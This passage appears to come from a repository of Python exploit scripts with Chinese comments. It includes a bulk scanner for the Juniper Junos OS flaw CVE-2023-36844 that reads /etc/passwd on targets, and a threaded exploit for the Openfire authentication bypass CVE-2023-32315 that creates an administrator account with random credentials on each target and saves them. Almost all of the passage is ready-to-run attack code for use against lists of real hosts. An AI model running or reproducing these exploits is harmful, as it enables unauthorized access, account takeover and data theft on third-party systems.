14 | response = requests.post(url + "/?PHPRC=/dev/fd/0", headers=headers, data=payload, proxies=proxies, verify=False)
15 | if response.status_code == 200 and "root:" in response.text:
16 | with open(success_file, 'a') as s_file:
17 | s_file.write(f"++++++++++++++++++\n")
18 | s_file.write(f"目标URL: {url}\n")
19 | s_file.write(f"Payload: cat /etc/passwd\n")
20 | s_file.write(f"响应内容:\n{response.text}\n\n")
21 | return True
22 | except Exception as e:
23 | print(f"发生异常:{e}")
24 | return False
25 |
26 | def scan_targets(targets, proxies={}, success_file=None):
27 | for target in targets:
28 | target = target.strip()
29 | check_for_vulnerability(target, proxies, success_file)
30 |
31 | if __name__ == '__main__':
32 | parser = argparse.ArgumentParser(description="Juniper Networks Junos OS 远程代码执行漏洞 CVE-2023-36844")
33 | parser.add_argument("-u", "--url", help="目标URL")
34 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
35 | args = parser.parse_args()
36 |
37 | if not args.url and not args.file:
38 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
39 | exit(1)
40 |
41 | if args.url:
42 | urls = [args.url]
43 | elif args.file:
44 | with open(args.file, 'r') as file:
45 | urls = file.readlines()
46 |
47 | proxies = {}
48 | success_file = 'success_targets.txt'
49 |
50 | for url in urls:
51 | url = url.strip()
52 | scan_targets([url], proxies, success_file)
53 |
54 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
55 |
--------------------------------------------------------------------------------
/openfire_CVE-2023-32315_exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-10-23
3 |
4 | import requests
5 | import argparse
6 | import threading
7 | import httplib2
8 | import random
9 | import re
10 | import string
11 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
12 |
13 | def generate_random_username(length=8):
14 | return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
15 |
16 | def generate_random_password(length=12):
17 | return ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(length))
18 |
19 | def check_for_vulnerability(url, proxies=None, success_file=None):
20 | path = '/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp'
21 | rsp_list = ''
22 | http = httplib2.Http(disable_ssl_certificate_validation=True, proxy_info=None, timeout=10)
23 | try:
24 | response, content = http.request(url + path, method='GET')
25 | for header_name, header_value in response.items():
26 | rsp_list += header_value
27 | if "csrf=" in rsp_list:
28 | JSESSIONID = re.findall(r'JSESSIONID=(.*?);', rsp_list)[0]
29 | csrf = re.findall(r'csrf=(.*?);', rsp_list)[0]
30 | else:
31 | return False
32 | headers = {
33 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
34 | 'Cookie': 'JSESSIONID={}; csrf={}'.format(JSESSIONID, csrf)
35 | }
36 | random_username = generate_random_username()
37 | random_password = generate_random_password()
38 | addpath = '/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={}&username={}&name=&email=&password={}&passwordConfirm={}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7'.format(
39 | csrf, random_username, random_password, random_password)
40 | add_user, content = http.request(url + addpath, method='GET', headers=headers)
41 | if add_user.status == 200 and "at" in content.decode('utf-8'):
42 | print(f"目标URL: {url} username: {random_username}, password: {random_password}")
43 | with open(success_file, 'a') as s_file:
44 | s_file.write(f"++++++++++++++++++\n")
45 | s_file.write(f"目标URL: {url}\n")
46 | s_file.write(f"响应内容: username: {random_username}, password: {random_password}\n\n")
47 | return True
48 | except Exception as e:
49 | print(f"发生异常:{e}")
50 | return False
51 |
52 | def scan_targets(targets, proxies=None, success_file=None):
53 | for target in targets:
54 | target = target.strip()
55 | check_for_vulnerability(target, proxies, success_file)
56 |
57 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
58 | threads = []
59 |
60 | for i in range(num_threads):
61 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
62 | threads.append(thread)
63 |
64 | for thread in threads:
65 | thread.start()
66 |
67 | for thread in threads:
68 | thread.join()
69 |
70 | if __name__ == '__main__':
71 | parser = argparse.ArgumentParser(description="Openfire 身份认证绕过CVE-2023-32315")
72 | parser.add_argument("-u", "--url", help="目标URL")
73 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
74 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
75 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
76 | args = parser.parse_args()
77 |
78 | if not args.url and not args.file:
79 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
80 | exit(1)
81 |
82 | if args.url:
83 | urls = [args.url]
84 | elif args.file:
85 | with open(args.file, 'r') as file:
86 | urls = file.readlines()
87 |
88 | success_file = 'success_targets.txt'
89 |
90 | proxies = {
91 | "http": args.proxy,
92 | "https": args.proxy
93 | } if args.proxy else None
94 |
95 | multi_threaded_scan(urls, proxies, success_file, args.threads)
96 |
97 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。"
98 |
--------------------------------------------------------------------------------